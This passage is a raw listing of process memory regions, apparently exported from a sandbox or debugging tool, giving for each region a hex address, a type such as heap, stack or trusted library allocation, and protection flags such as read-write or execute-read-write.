page read and write
227FF8A0000
heap
page read and write
506A000
trusted library allocation
page read and write
54BB000
trusted library allocation
page read and write
1A57AC9E000
heap
page read and write
2340000
trusted library allocation
page execute and read and write
4EAC000
trusted library allocation
page read and write
1A57AC08000
heap
page read and write
2AC5AB2E000
heap
page read and write
50F0000
trusted library allocation
page read and write
F16C5FE000
stack
page read and write
52D0000
trusted library allocation
page read and write
620000
heap
page read and write
2AC5D052000
heap
page read and write
2AC5AAE7000
heap
page read and write
66B9000
trusted library allocation
page read and write
10F0000
heap
page read and write
2AC5AB2E000
heap
page read and write
8390000
trusted library allocation
page read and write
65CD000
stack
page read and write
4EB6000
trusted library allocation
page read and write
2E4E000
stack
page read and write
1A578DFE000
heap
page read and write
2AC5CA6E000
heap
page read and write
4F12000
trusted library allocation
page read and write
7290000
trusted library allocation
page read and write
4EBA000
trusted library allocation
page read and write
2AC5AA4B000
heap
page read and write
5909000
trusted library allocation
page read and write
7341000
heap
page read and write
75C0000
trusted library allocation
page read and write
1A57D0EA000
heap
page read and write
4DE5000
trusted library allocation
page read and write
50CE000
trusted library allocation
page read and write
5A70000
heap
page read and write
1A578DDE000
heap
page read and write
271A000
trusted library allocation
page read and write
561C000
trusted library allocation
page read and write
676D000
stack
page read and write
505B000
trusted library allocation
page read and write
554F000
trusted library allocation
page read and write
1A57AB9E000
heap
page read and write
1A57D10C000
heap
page read and write
53FB000
trusted library allocation
page read and write
2810000
heap
page read and write
47E0000
trusted library allocation
page read and write
6E7B000
stack
page read and write
2A54000
trusted library allocation
page read and write
2AC5CB47000
heap
page read and write
58A1000
trusted library allocation
page read and write
54DD000
trusted library allocation
page read and write
35FE000
trusted library allocation
page read and write
1A57AC9E000
heap
page read and write
2AC5CC37000
heap
page read and write
2F1D000
trusted library allocation
page execute and read and write
1A57AAF3000
heap
page read and write
6660000
heap
page read and write
4E0D000
trusted library allocation
page read and write
2AC5D051000
heap
page read and write
1A57AB04000
heap
page read and write
5581000
trusted library allocation
page read and write
2AC5AB2E000
heap
page read and write
2AC5D07B000
heap
page read and write
60B0000
trusted library allocation
page execute and read and write
2C09000
heap
page read and write
36D8000
trusted library allocation
page read and write
7FFB1C305000
unkown
page readonly
5525000
trusted library allocation
page read and write
F16C2FF000
stack
page read and write
2AC5AA89000
heap
page read and write
1A57D123000
heap
page read and write
6EE0000
trusted library allocation
page read and write
2AC5AA63000
heap
page read and write
5A0F000
stack
page read and write
31E6000
trusted library allocation
page read and write
2AC5D01F000
heap
page read and write
1A578C00000
heap
page read and write
6ED0000
trusted library allocation
page execute and read and write
1A57C8E0000
heap
page read and write
538A000
trusted library allocation
page read and write
34DC000
trusted library allocation
page read and write
1A578C20000
heap
page read and write
645B000
stack
page read and write
558C000
trusted library allocation
page read and write
2AC5D029000
heap
page read and write
F16C8FD000
stack
page read and write
50E9000
trusted library allocation
page read and write
1A57D0AB000
heap
page read and write
4EF0000
trusted library allocation
page read and write
6220000
trusted library allocation
page execute and read and write
31DB000
trusted library allocation
page read and write
251E000
stack
page read and write
54CA000
trusted library allocation
page read and write
563F000
trusted library allocation
page read and write
733C000
stack
page read and write
4F3F000
trusted library allocation
page read and write
4EEE000
trusted library allocation
page read and write
1A57AB9E000
heap
page read and write
2AC5AA31000
heap
page read and write
1A57D104000
heap
page read and write
6680000
trusted library allocation
page execute and read and write
5375000
trusted library allocation
page read and write
4047000
trusted library allocation
page read and write
77E0000
trusted library allocation
page read and write
655E000
stack
page read and write
50E7000
trusted library allocation
page read and write
1A57AAFB000
heap
page read and write
482C000
stack
page read and write
31CF000
trusted library allocation
page read and write
7280000
trusted library allocation
page read and write
A040000
trusted library section
page read and write
1A57D0D6000
heap
page read and write
5100000
trusted library allocation
page read and write
4D98000
trusted library allocation
page read and write
2AC5AB2E000
heap
page read and write
81B6000
stack
page read and write
2AC5ABB0000
heap
page read and write
586C8FF000
stack
page read and write
2AC5C470000
heap
page read and write
1A578D53000
heap
page read and write
5117000
trusted library allocation
page read and write
4C00000
trusted library allocation
page read and write
2AC5AB2E000
heap
page read and write
584F000
stack
page read and write
1A578D51000
heap
page read and write
7FFB23B16000
unkown
page readonly
73D1D000
unkown
page read and write
4D2E000
stack
page read and write
8708000
trusted library allocation
page read and write
B3D3DFB000
stack
page read and write
1515000
trusted library allocation
page execute and read and write
2AC5AAB3000
heap
page read and write
2AC5C7DD000
heap
page read and write
5569000
trusted library allocation
page read and write
8820000
trusted library allocation
page read and write
227FF8E9000
heap
page read and write
52DF000
trusted library allocation
page read and write
227FF876000
heap
page read and write
2AC5C61C000
heap
page read and write
2C90000
heap
page read and write
2772000
heap
page read and write
1A578DFE000
heap
page read and write
3D0000
unkown
page readonly
8240000
trusted library allocation
page execute and read and write
40D6000
trusted library allocation
page read and write
2AC58B3B000
heap
page read and write
8325000
trusted library allocation
page read and write
3729000
trusted library allocation
page read and write
55F8000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
1A57AB9E000
heap
page read and write
3E1000
unkown
page read and write
2AC5AA68000
heap
page read and write
5636000
trusted library allocation
page read and write
2AC58D8A000
heap
page read and write
1A57AB9E000
heap
page read and write
2AC5AC2E000
heap
page read and write
2AC5AA4F000
heap
page read and write
55FA000
trusted library allocation
page read and write
5A80000
heap
page read and write
9E81000
trusted library allocation
page read and write
54D0000
heap
page execute and read and write
53C3000
trusted library allocation
page read and write
1A57CE92000
heap
page read and write
5332000
trusted library allocation
page read and write
8270000
trusted library allocation
page execute and read and write
6240000
trusted library allocation
page read and write
670000
trusted library allocation
page read and write
7CC6000
stack
page read and write
4B5E000
stack
page read and write
486E000
stack
page read and write
4D81000
trusted library allocation
page read and write
550F000
trusted library allocation
page read and write
2AC5C51D000
heap
page read and write
2F64000
trusted library allocation
page read and write
2F13000
trusted library allocation
page execute and read and write
4DE3000
trusted library allocation
page read and write
2AC5D0E2000
heap
page read and write
5139000
trusted library allocation
page read and write
23B0000
trusted library allocation
page read and write
71BE000
stack
page read and write
2AC58AA0000
heap
page read and write
4C7D000
stack
page read and write
50B5000
trusted library allocation
page read and write
1A57AADB000
heap
page read and write
266C000
stack
page read and write
2AC5CA6E000
heap
page read and write
50E1000
trusted library allocation
page read and write
4990000
trusted library allocation
page read and write
7370000
heap
page read and write
2AC5AA31000
heap
page read and write
1A57CB3B000
heap
page read and write
9A8A000
heap
page read and write
55AB000
trusted library allocation
page read and write
1A578D85000
heap
page read and write
4E77000
trusted library allocation
page read and write
536E000
stack
page read and write
29FD000
stack
page read and write
2AC5C770000
heap
page read and write
3D1000
unkown
page execute read
1A57AAAF000
heap
page read and write
3E2000
unkown
page readonly
4DBB000
trusted library allocation
page read and write
5153000
trusted library allocation
page read and write
2AC58B61000
heap
page read and write
5347000
trusted library allocation
page read and write
2AC5AB2E000
heap
page read and write
2355000
trusted library allocation
page read and write
50B1000
trusted library allocation
page read and write
1A57CA3F000
heap
page read and write
7330000
trusted library allocation
page read and write
1A57AB9E000
heap
page read and write
1A57C4FD000
heap
page read and write
2AC5AB2E000
heap
page read and write
55CA000
trusted library allocation
page read and write
8BBF000
trusted library allocation
page read and write
8990000
trusted library allocation
page execute and read and write
2AC5AA39000
heap
page read and write
4E3D000
trusted library allocation
page read and write
7220000
trusted library allocation
page read and write
2AC5CE1C000
heap
page read and write
1560000
heap
page read and write
9A90000
trusted library allocation
page read and write
7571000
trusted library allocation
page read and write
77A0000
trusted library allocation
page read and write
2AC58D8B000
heap
page read and write
1A57B1FE000
heap
page read and write
52FC000
trusted library allocation
page read and write
50CC000
trusted library allocation
page read and write
3723000
trusted library allocation
page read and write
35E6000
trusted library allocation
page read and write
2FAA000
heap
page read and write
7810000
trusted library allocation
page read and write
3715000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
DA7000
stack
page read and write
586CCFB000
stack
page read and write
2A5D000
trusted library allocation
page execute and read and write
603E000
stack
page read and write
1A57AC9E000
heap
page read and write
2AC58B51000
heap
page read and write
47D0000
trusted library allocation
page read and write
5128000
trusted library allocation
page read and write
2AC58D89000
heap
page read and write
2F3A000
trusted library allocation
page execute and read and write
2AC5AA93000
heap
page read and write
7247000
trusted library allocation
page read and write
4F43000
trusted library allocation
page read and write
2AC5D082000
heap
page read and write
2A53000
trusted library allocation
page execute and read and write
516E000
trusted library allocation
page read and write
1A578CAC000
heap
page read and write
94E000
stack
page read and write
5588000
trusted library allocation
page read and write
52E3000
trusted library allocation
page read and write
5433000
trusted library allocation
page read and write
4F05000
trusted library allocation
page read and write
A104000
heap
page read and write
2AC5CFE2000
heap
page read and write
43D7000
heap
page read and write
54A4000
trusted library allocation
page read and write
71FD000
stack
page read and write
139F000
stack
page read and write
4E7B000
trusted library allocation
page read and write
1A57CE38000
heap
page read and write
557F000
trusted library allocation
page read and write
1211000
heap
page read and write
2AC5CBC6000
heap
page read and write
5DAE000
stack
page read and write
1A57AAB9000
heap
page read and write
5289000
trusted library allocation
page read and write
2CCA000
heap
page read and write
665E000
stack
page read and write
9C8A000
trusted library allocation
page read and write
1A57C68D000
heap
page read and write
5FFE000
stack
page read and write
50B3000
trusted library allocation
page read and write
4E73000
trusted library allocation
page read and write
A100000
trusted library allocation
page execute and read and write
717E000
stack
page read and write
2C2F000
heap
page read and write
4F22000
trusted library allocation
page read and write
3149000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
1A57AB67000
heap
page read and write
562E000
stack
page read and write
6280000
trusted library allocation
page read and write
5627000
trusted library allocation
page read and write
674000
trusted library allocation
page read and write
5294000
trusted library allocation
page read and write
66E0000
trusted library allocation
page read and write
1A57AAD3000
heap
page read and write
3637000
trusted library allocation
page read and write
513A000
stack
page read and write
53B6000
trusted library allocation
page read and write
5B44000
trusted library allocation
page read and write
48A0000
heap
page read and write
1A57C60E000
heap
page read and write
4F70000
heap
page read and write
55E1000
trusted library allocation
page read and write
588C000
stack
page read and write
2A21000
trusted library allocation
page read and write
4EF2000
trusted library allocation
page read and write
227FFAC5000
heap
page read and write
1A57AAD8000
heap
page read and write
2AC5AA9B000
heap
page read and write
2AC5AA68000
heap
page read and write
56A0000
trusted library allocation
page execute and read and write
2AC58D8B000
heap
page read and write
5287000
trusted library allocation
page read and write
371E000
trusted library allocation
page read and write
2AC5CFF2000
heap
page read and write
2947000
stack
page read and write
2A40000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
2F90000
trusted library allocation
page execute and read and write
2AC5D082000
heap
page read and write
22781780000
heap
page read and write
1A57AB9E000
heap
page read and write
561E000
trusted library allocation
page read and write
2F32000
trusted library allocation
page read and write
52B1000
trusted library allocation
page read and write
1A57AAA0000
heap
page read and write
6A7000
trusted library allocation
page execute and read and write
2AC5AA40000
heap
page read and write
5156000
trusted library allocation
page read and write
2AC5D01F000
heap
page read and write
6A2E000
stack
page read and write
516C000
trusted library allocation
page read and write
5A4E000
trusted library allocation
page read and write
839E000
trusted library allocation
page read and write
4F50000
trusted library allocation
page read and write
48FE000
trusted library allocation
page read and write
4189000
trusted library allocation
page read and write
53C0000
trusted library allocation
page read and write
1A57AB9E000
heap
page read and write
7FFB23B20000
unkown
page read and write
1A578D87000
heap
page read and write
2C00000
heap
page read and write
1A57AAC3000
heap
page read and write
4CBE000
stack
page read and write
5624000
trusted library allocation
page read and write
2AC5AB31000
heap
page read and write
1A57C9DE000
heap
page read and write
4E49000
trusted library allocation
page read and write
2270000
trusted library allocation
page read and write
2AC5BD86000
heap
page read and write
4E7E000
stack
page read and write
2320000
heap
page execute and read and write
227FF887000
heap
page read and write
6F60000
trusted library allocation
page read and write
2AC5D07B000
heap
page read and write
2AC5CFE6000
heap
page read and write
1A57BDF6000
heap
page read and write
354D000
trusted library allocation
page read and write
F16CBFE000
stack
page read and write
2AC58BAA000
heap
page read and write
1A57AACB000
heap
page read and write
53A3000
trusted library allocation
page read and write
73EE000
heap
page read and write
115D000
stack
page read and write
1A57AC9E000
heap
page read and write
540F000
trusted library allocation
page read and write
227FF8B4000
heap
page read and write
1A57C6DE000
heap
page read and write
1A578D00000
heap
page read and write
1A57AABB000
heap
page read and write
7F5F000
stack
page read and write
2AC5AB97000
heap
page read and write
2F14000
trusted library allocation
page read and write
72A0000
trusted library allocation
page read and write
4D94000
trusted library allocation
page read and write
3746000
trusted library allocation
page read and write
343C000
trusted library allocation
page read and write
56F0000
trusted library allocation
page read and write
1550000
trusted library allocation
page read and write
2AC5C51E000
heap
page read and write
4F63000
trusted library allocation
page read and write
59E000
stack
page read and write
4DC6000
trusted library allocation
page read and write
5666000
trusted library allocation
page read and write
529A000
trusted library allocation
page read and write
1A57ABA7000
heap
page read and write
54AE000
stack
page read and write
72AE000
stack
page read and write
7FFB23B00000
unkown
page readonly
5586000
trusted library allocation
page read and write
5630000
trusted library allocation
page read and write
5206000
trusted library allocation
page read and write
1A578D55000
heap
page read and write
2AC58B2F000
heap
page read and write
2ED0000
heap
page read and write
5115000
trusted library allocation
page read and write
2AC5AA33000
heap
page read and write
1A57C8CC000
heap
page read and write
2AC58BAA000
heap
page read and write
1A57CADD000
heap
page read and write
4F40000
heap
page read and write
2AC5AB2E000
heap
page read and write
379F000
trusted library allocation
page read and write
2AC5AB2E000
heap
page read and write
5366000
trusted library allocation
page read and write
1A57AB9E000
heap
page read and write
4E9C000
trusted library allocation
page read and write
3521000
trusted library allocation
page read and write
5C20000
heap
page read and write
4E13000
trusted library allocation
page read and write
1A57AB9E000
heap
page read and write
7361000
heap
page read and write
8260000
heap
page read and write
1A578D4E000
heap
page read and write
227FF87A000
heap
page read and write
6F70000
heap
page read and write
8230000
trusted library allocation
page read and write
2AC5AABF000
heap
page read and write
53D7000
trusted library allocation
page read and write
4DD2000
trusted library allocation
page read and write
722E000
stack
page read and write
2AC58BFE000
heap
page read and write
5508000
trusted library allocation
page read and write
37C6000
trusted library allocation
page read and write
503E000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page execute and read and write
2AC5CDD8000
heap
page read and write
53BC000
trusted library allocation
page read and write
1A57CACD000
heap
page read and write
54D8000
trusted library allocation
page read and write
31BA000
trusted library allocation
page read and write
5ACA000
trusted library allocation
page read and write
4E62000
trusted library allocation
page read and write
2AC5D054000
heap
page read and write
5A90000
heap
page read and write
4970000
trusted library allocation
page execute and read and write
1A57D0AB000
heap
page read and write
1A57C68D000
heap
page read and write
8701000
trusted library allocation
page read and write
B3D37FF000
stack
page read and write
8133000
heap
page read and write
227FF861000
heap
page read and write
55D2000
trusted library allocation
page read and write
2F51000
trusted library allocation
page read and write
4F0B000
trusted library allocation
page read and write
4980000
trusted library allocation
page read and write
5664000
trusted library allocation
page read and write
2AC5AA93000
heap
page read and write
6E5E000
stack
page read and write
76D0000
trusted library allocation
page execute and read and write
5C2A000
heap
page read and write
2AC5AA3F000
heap
page read and write
6210000
trusted library allocation
page read and write
43AE000
stack
page read and write
2AC5AB2E000
heap
page read and write
2AC5AAA7000
heap
page read and write
1A57C8DF000
heap
page read and write
5577000
trusted library allocation
page read and write
5126000
trusted library allocation
page read and write
2AC5D082000
heap
page read and write
8280000
trusted library allocation
page read and write
4E2A000
trusted library allocation
page read and write
75B0000
trusted library allocation
page read and write
8130000
heap
page read and write
2AC5AB2E000
heap
page read and write
564F000
trusted library allocation
page read and write
5F1B000
trusted library allocation
page read and write
5300000
trusted library allocation
page read and write
227FF850000
heap
page read and write
2AC58B3D000
heap
page read and write
4D62000
trusted library allocation
page read and write
4EEC000
trusted library allocation
page read and write
2F36000
trusted library allocation
page execute and read and write
42AE000
stack
page read and write
5319000
trusted library allocation
page read and write
6AEA000
stack
page read and write
4D6D000
trusted library allocation
page read and write
8910000
trusted library section
page read and write
6600000
trusted library allocation
page execute and read and write
2AC5D053000
heap
page read and write
2AC5AA68000
heap
page read and write
5437000
trusted library allocation
page read and write
42E0000
heap
page execute and read and write
1A57D049000
heap
page read and write
4063000
trusted library allocation
page read and write
4D71000
trusted library allocation
page read and write
7E70000
heap
page read and write
8110000
trusted library allocation
page read and write
4C30000
trusted library allocation
page execute and read and write
57BF000
trusted library allocation
page read and write
1A57ABC2000
heap
page read and write
5527000
trusted library allocation
page read and write
52B7000
trusted library allocation
page read and write
2AC5C96F000
heap
page read and write
2AC5AB2E000
heap
page read and write
5A48000
trusted library allocation
page read and write
AC7000
heap
page read and write
53F5000
trusted library allocation
page read and write
59CE000
stack
page read and write
8A81000
trusted library allocation
page read and write
4897000
heap
page read and write
1A57C7DF000
heap
page read and write
2AC5AA50000
heap
page read and write
9321000
trusted library allocation
page read and write
55C8000
trusted library allocation
page read and write
2AC5CFE7000
heap
page read and write
1A57C7DF000
heap
page read and write
2D37000
heap
page read and write
57FF000
stack
page read and write
5665000
trusted library allocation
page read and write
1A57ABAA000
heap
page read and write
372E000
trusted library allocation
page read and write
55DE000
stack
page read and write
2AC58BDA000
heap
page read and write
1A57D12C000
heap
page read and write
8410000
trusted library allocation
page execute and read and write
5C0E000
stack
page read and write
7E20000
trusted library allocation
page read and write
764E000
stack
page read and write
1A57C55A000
heap
page read and write
6FFB000
stack
page read and write
2AC5AAF7000
heap
page read and write
1A57AB9E000
heap
page read and write
1A578CAE000
heap
page read and write
50CA000
trusted library allocation
page read and write
4870000
trusted library allocation
page read and write
2AC5CAC8000
heap
page read and write
4E50000
trusted library allocation
page read and write
8420000
trusted library allocation
page execute and read and write
1A57D0D6000
heap
page read and write
2710000
heap
page read and write
1A578DFE000
heap
page read and write
29FE000
stack
page read and write
53BE000
trusted library allocation
page read and write
4DD4000
trusted library allocation
page read and write
5174000
trusted library allocation
page read and write
73D1F000
unkown
page readonly
2AC5AB17000
heap
page read and write
36C4000
trusted library allocation
page read and write
F16C3FF000
stack
page read and write
53EE000
trusted library allocation
page read and write
4ED3000
trusted library allocation
page read and write
1A57D09D000
heap
page read and write
2AC5C66E000
heap
page read and write
1A57C58E000
heap
page read and write
4DCE000
trusted library allocation
page read and write
532A000
trusted library allocation
page read and write
1A57D0E9000
heap
page read and write
7E6E000
stack
page read and write
586C2A6000
stack
page read and write
55D0000
trusted library allocation
page read and write
2AC5C61C000
heap
page read and write
4DED000
trusted library allocation
page read and write
1A57D104000
heap
page read and write
2AC5AA43000
heap
page read and write
8400000
trusted library section
page read and write
2786000
trusted library allocation
page read and write
2350000
trusted library allocation
page read and write
4E2E000
trusted library allocation
page read and write
1A57D09C000
heap
page read and write
673000
trusted library allocation
page execute and read and write
37ED000
trusted library allocation
page read and write
4F65000
trusted library allocation
page read and write
5F5F000
trusted library allocation
page read and write
8120000
heap
page read and write
1A57CCB2000
heap
page read and write
352D000
trusted library allocation
page read and write
52DD000
trusted library allocation
page read and write
6410000
trusted library allocation
page read and write
519C000
trusted library allocation
page read and write
1A57BDFD000
heap
page read and write
4E28000
trusted library allocation
page read and write
7433000
heap
page read and write
2AC5CA71000
heap
page read and write
374E000
trusted library allocation
page read and write
1A57AACF000
heap
page read and write
1A578CAB000
heap
page read and write
4E00000
trusted library allocation
page read and write
290C000
stack
page read and write
227FF8A2000
heap
page read and write
2AC5AA3B000
heap
page read and write
4CDA000
trusted library allocation
page read and write
2AC5D093000
heap
page read and write
1A57C500000
heap
page read and write
2AC5AA90000
heap
page read and write
461D000
stack
page read and write
6F67000
trusted library allocation
page read and write
1A57D08F000
heap
page read and write
1A57D10C000
heap
page read and write
5644000
trusted library allocation
page read and write
8F61000
trusted library allocation
page read and write
F16BF2A000
stack
page read and write
7210000
trusted library allocation
page execute and read and write
55C2000
trusted library allocation
page read and write
36AD000
trusted library allocation
page read and write
2D4E000
stack
page read and write
2A3F000
stack
page read and write
A80000
trusted library allocation
page read and write
4F1A000
trusted library allocation
page read and write
36B4000
trusted library allocation
page read and write
2AC5BD80000
heap
page read and write
55B3000
trusted library allocation
page read and write
54FC000
trusted library allocation
page read and write
4EF6000
trusted library allocation
page read and write
6BEB000
stack
page read and write
3734000
trusted library allocation
page read and write
227FF7E0000
heap
page read and write
9A8C000
heap
page read and write
9C80000
trusted library allocation
page read and write
1A57C8DF000
heap
page read and write
1A578CA9000
heap
page read and write
5690000
trusted library allocation
page execute and read and write
2AC58BAA000
heap
page read and write
227FF8A3000
heap
page read and write
1A57CF4A000
heap
page read and write
1A57CD38000
heap
page read and write
52D9000
trusted library allocation
page read and write
54C1000
trusted library allocation
page read and write
68DE000
stack
page read and write
1A57AAC9000
heap
page read and write
6F86000
heap
page read and write
1A57CBC3000
heap
page read and write
2AC58D88000
heap
page read and write
2A72000
trusted library allocation
page read and write
1281000
heap
page read and write
2AC58BFE000
heap
page read and write
5622000
trusted library allocation
page read and write
6770000
heap
page read and write
292E000
trusted library allocation
page read and write
5240000
trusted library section
page read and write
7560000
trusted library allocation
page read and write
1A57AAA7000
heap
page read and write
F16CAFE000
stack
page read and write
5790000
trusted library allocation
page read and write
11D6000
heap
page read and write
52BB000
trusted library allocation
page read and write
5360000
trusted library allocation
page read and write
3E2000
unkown
page readonly
5B1A000
heap
page read and write
1A57D0D6000
heap
page read and write
5194000
trusted library allocation
page read and write
6DAF000
stack
page read and write
2740000
heap
page read and write
348000
unkown
page execute read
7CEC000
trusted library allocation
page read and write
9A82000
heap
page read and write
1A57D083000
heap
page read and write
50C8000
trusted library allocation
page read and write
2AC5C66E000
heap
page read and write
2AC58D80000
heap
page read and write
1A578CAA000
heap
page read and write
4DE9000
trusted library allocation
page read and write
1A57CE49000
heap
page read and write
77F0000
trusted library allocation
page read and write
5A90000
trusted library allocation
page read and write
5185000
trusted library allocation
page read and write
4960000
trusted library allocation
page read and write
2AC5AB30000
heap
page read and write
559E000
trusted library allocation
page read and write
5051000
trusted library allocation
page read and write
50FA000
trusted library allocation
page read and write
4F3B000
trusted library allocation
page read and write
7FFB23B00000
unkown
page readonly
775E000
stack
page read and write
2AC5C471000
heap
page read and write
2D20000
trusted library section
page read and write
5620000
trusted library allocation
page read and write
1A57BDFD000
heap
page read and write
4B60000
trusted library section
page read and write
7CF0000
trusted library allocation
page read and write
1A57AB87000
heap
page read and write
1A57AB9E000
heap
page read and write
713E000
stack
page read and write
5A40000
trusted library allocation
page read and write
7FFB23B20000
unkown
page read and write
1190000
trusted library allocation
page read and write
551E000
trusted library allocation
page read and write
5521000
trusted library allocation
page read and write
2AC5C670000
heap
page read and write
5A0000
heap
page read and write
3146000
trusted library allocation
page read and write
1A57D083000
heap
page read and write
1A57AB9E000
heap
page read and write
5B3E000
heap
page read and write
55A9000
trusted library allocation
page read and write
5373000
trusted library allocation
page read and write
52BD000
trusted library allocation
page read and write
3760000
trusted library allocation
page read and write
55F6000
trusted library allocation
page read and write
6F3E000
stack
page read and write
5506000
trusted library allocation
page read and write
4F20000
trusted library allocation
page execute and read and write
4E11000
trusted library allocation
page read and write
519A000
trusted library allocation
page read and write
297E000
stack
page read and write
5057000
trusted library allocation
page read and write
61F2000
trusted library allocation
page read and write
37FC000
trusted library allocation
page read and write
50B7000
trusted library allocation
page read and write
73D01000
unkown
page execute read
2AC5D07B000
heap
page read and write
54D6000
trusted library allocation
page read and write
2AC5AA59000
heap
page read and write
2AC5AACB000
heap
page read and write
7317000
trusted library allocation
page read and write
4DFE000
trusted library allocation
page read and write
2CD1000
heap
page read and write
1A57D0CA000
heap
page read and write
5A50000
trusted library allocation
page read and write
1A57AB03000
heap
page read and write
5159000
trusted library allocation
page read and write
586C6FF000
stack
page read and write
541E000
stack
page read and write
1A578DA8000
heap
page read and write
1A578DAB000
heap
page read and write
5B5E000
heap
page read and write
1A57D05C000
heap
page read and write
227FF887000
heap
page read and write
7090000
trusted library allocation
page read and write
2AC5CBC7000
heap
page read and write
5079000
trusted library allocation
page read and write
1110000
heap
page read and write
7FFB23B25000
unkown
page readonly
5D0000
heap
page read and write
7FFB23B22000
unkown
page readonly
6400000
trusted library allocation
page read and write
825E000
stack
page read and write
2AC5AB07000
heap
page read and write
1A57D05D000
heap
page read and write
55E9000
trusted library allocation
page read and write
4DA3000
trusted library allocation
page read and write
4C6E000
stack
page read and write
1A57ABA0000
heap
page read and write
2AC5C96E000
heap
page read and write
50B9000
trusted library allocation
page read and write
50E3000
trusted library allocation
page read and write
2A69000
trusted library allocation
page read and write
4E30000
trusted library allocation
page read and write
2A80000
trusted library allocation
page read and write
1A578DAB000
heap
page read and write
6200000
trusted library allocation
page read and write
3F51000
trusted library allocation
page read and write
2AC5AB2E000
heap
page read and write
342A000
trusted library allocation
page read and write
2AC5CFD7000
heap
page read and write
1530000
trusted library allocation
page read and write
5172000
trusted library allocation
page read and write
816000
heap
page read and write
39E3000
trusted library allocation
page read and write
52E5000
trusted library allocation
page read and write
5096000
trusted library allocation
page read and write
5352000
trusted library allocation
page read and write
1A57C6DE000
heap
page read and write
69AD000
stack
page read and write
1A57AB9E000
heap
page read and write
534B000
trusted library allocation
page read and write
3358000
trusted library allocation
page read and write
505D000
trusted library allocation
page read and write
2AC5C61C000
heap
page read and write
7FB0000
trusted library allocation
page read and write
5D79000
trusted library allocation
page read and write
2AC5D0E7000
heap
page read and write
8340000
trusted library allocation
page read and write
5634000
trusted library allocation
page read and write
1A57AAAB000
heap
page read and write
2D70000
heap
page execute and read and write
83E0000
trusted library allocation
page read and write
2AC5C621000
heap
page read and write
4ED1000
trusted library allocation
page read and write
712C000
stack
page read and write
5641000
trusted library allocation
page read and write
5124000
trusted library allocation
page read and write
4E7D000
trusted library allocation
page read and write
4E2C000
trusted library allocation
page read and write
513F000
trusted library allocation
page read and write
2AC5AA49000
heap
page read and write
1A57CB3A000
heap
page read and write
8690000
trusted library section
page read and write
7F5C0000
trusted library allocation
page execute and read and write
4F10000
trusted library allocation
page execute and read and write
9AE3000
heap
page read and write
55B5000
trusted library allocation
page read and write
5296000
trusted library allocation
page read and write
2AC58B4F000
heap
page read and write
768E000
stack
page read and write
42B0000
trusted library allocation
page read and write
1A57CE3D000
heap
page read and write
2AC5AA93000
heap
page read and write
1A57AC55000
heap
page read and write
2AC5CFF1000
heap
page read and write
2AC5ABF0000
heap
page read and write
506C000
trusted library allocation
page read and write
2D00000
heap
page read and write
2AC5D0B5000
heap
page read and write
432F000
stack
page read and write
8850000
trusted library allocation
page execute and read and write
11BE000
heap
page read and write
5334000
trusted library allocation
page read and write
54B9000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
1A57C940000
heap
page read and write
4E5E000
trusted library allocation
page read and write
1A57D12C000
heap
page read and write
2AC5AC2E000
heap
page read and write
7F3B0000
trusted library allocation
page execute and read and write
5630000
trusted library allocation
page read and write
7790000
trusted library allocation
page read and write
8680000
trusted library allocation
page execute and read and write
7080000
trusted library allocation
page read and write
535C000
trusted library allocation
page read and write
227FF8E9000
heap
page read and write
589D000
stack
page read and write
F16C6FE000
stack
page read and write
5407000
trusted library allocation
page read and write
550A000
trusted library allocation
page read and write
2F77000
heap
page read and write
1A57AB9E000
heap
page read and write
351000
unkown
page write copy
2AC5D0B1000
heap
page read and write
72EF000
stack
page read and write
2F30000
trusted library allocation
page read and write
692000
trusted library allocation
page read and write
1A57CB2D000
heap
page read and write
5D6000
heap
page read and write
61E000
stack
page read and write
2AC5CD28000
heap
page read and write
33F9000
trusted library allocation
page read and write
2AC5C86F000
heap
page read and write
352000
unkown
page readonly
1A57D11C000
heap
page read and write
2ECE000
stack
page read and write
50AD000
trusted library allocation
page read and write
2AC5C8BD000
heap
page read and write
1A57CF49000
heap
page read and write
6EEC000
trusted library allocation
page read and write
1A57D04A000
heap
page read and write
1A57AC81000
heap
page read and write
5349000
trusted library allocation
page read and write
1A57D11C000
heap
page read and write
1A57CADD000
heap
page read and write
2AC5AB2E000
heap
page read and write
29B0000
heap
page read and write
2840000
trusted library section
page read and write
9CF6000
trusted library allocation
page read and write
534E000
trusted library allocation
page read and write
2E40000
heap
page read and write
4DF9000
stack
page read and write
56C0000
trusted library allocation
page read and write
1A57D08F000
heap
page read and write
1A57D104000
heap
page read and write
1A57C6E0000
heap
page read and write
4D9C000
trusted library allocation
page read and write
586C7FE000
stack
page read and write
87D0000
trusted library allocation
page read and write
66ED000
trusted library allocation
page read and write
1A57AAB0000
heap
page read and write
4D4F000
trusted library allocation
page read and write
2AB0000
heap
page readonly
1A57D064000
heap
page read and write
56E0000
trusted library allocation
page read and write
1A57D10C000
heap
page read and write
5520000
trusted library allocation
page execute and read and write
2F42000
trusted library allocation
page read and write
2AC58AC0000
heap
page read and write
5AB0000
trusted library allocation
page execute and read and write
2AC5C66E000
heap
page read and write
55F4000
trusted library allocation
page read and write
61BE000
stack
page read and write
5104000
trusted library allocation
page read and write
530F000
trusted library allocation
page read and write
1A57D081000
heap
page read and write
7310000
trusted library allocation
page read and write
5114000
trusted library allocation
page read and write
8830000
trusted library allocation
page execute and read and write
2710000
trusted library allocation
page read and write
2AC58B29000
heap
page read and write
5A98000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
5A4C000
stack
page read and write
5271000
trusted library allocation
page read and write
1A57D0D6000
heap
page read and write
5108000
trusted library allocation
page read and write
2D6C000
trusted library allocation
page read and write
2860000
heap
page read and write
2AC58D8A000
heap
page read and write
5C10000
trusted library allocation
page read and write
4D86000
trusted library allocation
page read and write
1A57C5CD000
heap
page read and write
2AC5CAC7000
heap
page read and write
655D000
stack
page read and write
2AC5D093000
heap
page read and write
14ED000
trusted library allocation
page execute and read and write
6EC0000
heap
page read and write
43B0000
trusted library allocation
page read and write
2AC58B6F000
heap
page read and write
55B7000
trusted library allocation
page read and write
1A57CD39000
heap
page read and write
2AC5CAC7000
heap
page read and write
2A7A000
trusted library allocation
page execute and read and write
5615000
trusted library allocation
page read and write
1A57D064000
heap
page read and write
5F9C000
trusted library allocation
page read and write
5644000
trusted library allocation
page read and write
480000
heap
page read and write
1A57AB9E000
heap
page read and write
2AC5AB2E000
heap
page read and write
76CD000
stack
page read and write
2866000
heap
